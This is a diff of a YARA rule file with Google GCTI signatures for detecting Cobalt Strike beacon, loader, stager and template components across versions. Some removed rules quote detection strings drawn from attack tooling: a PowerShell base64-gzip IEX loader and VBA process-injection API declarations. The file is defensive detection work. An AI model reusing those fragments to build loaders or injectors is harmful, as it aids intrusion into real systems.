-      C6 45 F2 61
-      C6 45 F3 70
-      C6 45 F4 41
-      C6 45 F5 6C
-      C6 45 F6 6C
-      C6 45 F7 6F
-      C6 45 F8 63
-      C6 45 F9 00
-    }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6
-{
-	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6"
-		author = "gssincla@google.com"
-		id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111"
-		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44"
-		logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$core_sig = {
-      C6 45 EC 4D
-      C6 45 ED 61
-      C6 45 EE 70
-      C6 45 EF 56
-      C6 45 F0 69
-      C6 45 F1 65
-      C6 45 F2 77
-      C6 45 F3 4F
-      C6 45 F4 66
-      C6 45 F5 46
-      C6 45 F6 69
-      C6 45 F7 6C
-      C6 45 F8 65
-      C6 45 F9 00
-    }
-
-	condition:
-		all of them
-}
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6
-{
-	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6"
-		author = "gssincla@google.com"
-		id = "5f89c4be-f4c5-54d3-b923-d125de53902f"
-		date = "2022-11-18"
-		modified = "2022-11-19"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L969-L1002"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
-		logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4"
+		hash = "da9e91b3d8df3d53425dd298778782be3bdcda40037bd5c92928395153160549"
+		logic_hash = "297ff7c3acfe6f9676dc6c265c548f017f39ccc5217617344e3bccc704ac4c78"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 45 B0 56
-      C6 45 B1 69
-      C6 45 B2 72
-      C6 45 B3 74
-      C6 45 B4 75
-      C6 45 B5 61
-      C6 45 B6 6C
-      C6 45 B7 41
-      C6 45 B8 6C
-      C6 45 B9 6C
-      C6 45 BA 6F
-      C6 45 BB 63
-      C6 45 BC 00
-    }
-		$deobfuscator = {
-      8B 4D FC
-      83 C1 01
-      89 4D FC
-      8B 55 FC
-      3B 55 0C
-      73 19
-      0F B6 45 10
-      8B 4D 08
-      03 4D FC
-      0F BE 11
-      33 D0
-      8B 45 08
-      03 45 FC
-      88 10
-      EB D6
-    }
+		$version_sig = { 53 56 48 57 8B F2 83 F8 67 0F 87 5E 03 00 00  }
+		$decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_2
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.2"
 		author = "gssincla@google.com"
-		id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c"
+		id = "61188243-0b90-5bff-bcc8-50f10ed941f6"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1029-L1068"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
-		logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2"
+		hash = "5993a027f301f37f3236551e6ded520e96872723a91042bfc54775dcb34c94a1"
+		logic_hash = "3803aaac537aec0b188870177e510a3789a71c19be576569b59aa146b2ba62c5"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 45 B0 56
-      C6 45 B1 69
-      C6 45 B2 72
-      C6 45 B3 74
-      C6 45 B4 75
-      C6 45 B5 61
-      C6 45 B6 6C
-      C6 45 B7 41
-      C6 45 B8 6C
-      C6 45 B9 6C
-      C6 45 BA 6F
-      C6 45 BB 63
-      C6 45 BC 00
-    }
-		$deobfuscator = {
-      8B 4D FC
-      83 C1 01
-      89 4D FC
-      8B 55 FC
-      3B 55 0C
-      73 19
-      0F B6 45 10
-      8B 4D 08
-      03 4D FC
-      0F BE 11
-      33 D0
-      8B 45 08
-      03 45 FC
-      88 10
-      EB D6
-    }
+		$version_sig = { 4C 8D 05 9F F8 FF FF 8B D3 48 8B CF E8 05 1A 00 00
+                     EB 0A 8B D3 48 8B CF E8 41 21 00 00 48 8B 5C 24 30
+                     48 83 C4 20 }
+		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
 
 	condition:
-		$core_sig and not $deobfuscator
+		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3"
 		author = "gssincla@google.com"
-		id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb"
+		id = "fb96ecff-809e-5704-974e-a2d8ef022daa"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d"
-		logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65"
+		hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580"
+		logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 38 48
-      C6 44 24 39 65
-      C6 44 24 3A 61
-      C6 44 24 3B 70
-      C6 44 24 3C 41
-      C6 44 24 3D 6C
-      C6 44 24 3E 6C
-      C6 44 24 3F 6F
-      C6 44 24 40 63
-      C6 44 24 41 00
-    }
+		$version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF
+                     41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF
+                     E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 }
+		$decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4"
 		author = "gssincla@google.com"
-		id = "38e063db-3d76-5a94-812a-945fcf46a232"
+		id = "97ef152c-86c7-513c-a881-e7d594d38dcf"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594"
-		logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c"
+		hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0"
+		logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 58 4D
-      C6 44 24 59 61
-      C6 44 24 5A 70
-      C6 44 24 5B 56
-      C6 44 24 5C 69
-      C6 44 24 5D 65
-      C6 44 24 5E 77
-      C6 44 24 5F 4F
-      C6 44 24 60 66
-      C6 44 24 61 46
-      C6 44 24 62 69
-      C6 44 24 63 6C
-      C6 44 24 64 65
-    }
+		$version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF
+                     41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00
+                     48 8B 5C 24 30 48 83 C4 20 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1"
 		author = "gssincla@google.com"
-		id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85"
+		id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
-		logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6"
+		hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d"
+		logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 48 56
-      C6 44 24 49 69
-      C6 44 24 4A 72
-      C6 44 24 4B 74
-      C6 44 24 4C 75
-      C6 44 24 4D 61
-      C6 44 24 4E 6C
-      C6 44 24 4F 41
-      C6 44 24 50 6C
-      C6 44 24 51 6C
-      C6 44 24 52 6F
-      C6 44 24 53 63
-      C6 44 24 54 00
-    }
-		$deobfuscator = {
-      8B 04 24
-      FF C0
-      89 04 24
-      8B 44 24 28
-      39 04 24
-      73 20
-      8B 04 24
-      0F B6 4C 24 30
-      48 8B 54 24 20
-      0F BE 04 02
-      33 C1
-      8B 0C 24
-      48 8B 54 24 20
-      88 04 0A
-    }
+		$version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF
+                     41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00
+                     48 8B 5C 24 30 48 83 C4 20 5F }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6"
 		author = "gssincla@google.com"
-		id = "07f751e4-f001-5b95-b229-31fbaa867cea"
+		id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
-		logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef"
+		hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1"
+		logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      33 C0
-      83 F8 01
-      74 63
-      48 8B 44 24 20
-      0F B7 00
-      3D 4D 5A 00 00
-      75 45
-      48 8B 44 24 20
-      48 63 40 3C
-      48 89 44 24 28
-      48 83 7C 24 28 40
-      72 2F
-      48 81 7C 24 28 00 04 00 00
-      73 24
-      48 8B 44 24 20
-      48 8B 4C 24 28
-      48 03 C8
-      48 8B C1
-      48 89 44 24 28
-      48 8B 44 24 28
-      81 38 50 45 00 00
-      75 02
-    }
-		$deobfuscator = {
-      8B 04 24
-      FF C0
-      89 04 24
-      8B 44 24 28
-      39 04 24
-      73 20
-      8B 04 24
-      0F B6 4C 24 30
-      48 8B 54 24 20
-      0F BE 04 02
-      33 C1
-      8B 0C 24
-      48 8B 54 24 20
-      88 04 0A
-    }
+		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27
+                     0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14
+                     0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C
+                     0F 87 C8 00 00 00 0F 84 B3 00 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$core_sig and not $deobfuscator
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpstager_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7
 {
 	meta:
-		description = "Cobalt Strike's resources/httpstager.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7"
 		author = "gssincla@google.com"
-		id = "86109485-c26c-5c51-8d04-dd1add9a8c57"
+		id = "27fad98a-2882-5c52-af6e-c7dcf5559624"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager_Bin_v2_5_through_v4_x.yara#L17-L93"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "a47569af239af092880751d5e7b68d0d8636d9f678f749056e702c9b063df256"
-		logic_hash = "3baab08b0118e00432f1869ba5daa4fc6383bfc020119bfbb3047a008c33fe72"
+		hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60"
+		logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$downloaderLoop = {
-			B? 00 2F 00 00
-			39 ??
-			74 ??
-			31 ??
-			( E9 | EB )
-		}
+		$version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28
+                     0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15
+                     0F 87 DB 01 00 00 0F 84 BF 01 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $downloaderLoop
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Command_Ps1_V2_5_To_V3_7_And_Resources_Compress_Ps1_V3_8_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8
 {
 	meta:
-		description = "Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8"
 		author = "gssincla@google.com"
-		id = "c0b81deb-ed20-5f7e-8e15-e6a9e9362594"
+		id = "89809d81-9a8b-5cf3-a251-689bf52e98e0"
 		date = "2022-11-18"
-		modified = "2022-11-22"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x.yara#L17-L33"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62"
-		logic_hash = "31cf47060757b086d325cd205724a7be8931bbbc6ff2f4be67a6179ee99c42ca"
+		hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae"
+		logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$ps1 = "$s=New-Object \x49O.MemoryStream(,[Convert]::\x46romBase64String(" nocase
-		$ps2 = "));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" nocase
+		$version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF
+                     E8 8F 55 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11
 {
 	meta:
-		description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)"
 		author = "gssincla@google.com"
-		id = "074b7d83-e3d8-541c-804b-2417c21f54d5"
+		id = "bf0c7661-2583-5fca-beb5-abb2b50c860d"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c"
-		logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450"
+		hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a"
+		logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047"
 
 	strings:
-		$apiLocator = {
-			31 ??
-			AC
-			C1 ?? 0D
-			01 ??
-			38 ??
-			75 ??
-			03 [2]
-			3B [2]
-			75 ??
-			5?
-			8B ?? 24
-			01 ??
-			66 8B [2]
-			8B ?? 1C
-			01 ??
-			8B ?? 8B
-			01 ??
-			89 [3]
-			5?
-			5?
-		}
-		$smb = { 68 C6 96 87 52 }
-		$smbstart = {
-			6A 40
-			68 00 10 00 00
-			68 FF FF 07 00
-			6A 00
-			68 58 A4 53 E5
-		}
+		$version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00
+                     0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00
+                     0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00
+                     0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02
+                     0F 84 A6 00 00 00 FF C9 }
+		$decoder = {
+      80 34 28 ??
+      48 FF C0
+      48 3D 00 10 00 00
+      7C F1
+    }
 
 	condition:
-		$apiLocator and $smb and $smbstart
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12"
 		author = "gssincla@google.com"
-		id = "11c7758e-93b2-5fe3-873d-b98de579d2b4"
+		id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142"
-		logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38"
+		hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc"
+		logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase
-		$allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase
-		$writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase
-		$runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase
-		$vars = "Dim rwxpage As Long" nocase
-		$res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)"
-		$rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)"
+		$version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF
+                     E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		all of them and @vars [ 1 ] < @res [ 1 ] and @allocstuff [ 1 ] < @rwxpage [ 1 ]
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13
 {
 	meta:
-		description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13"
 		author = "gssincla@google.com"
-		id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e"
+		id = "202eb8ea-7afb-515b-9306-67514abf5e55"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f"
-		logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e"
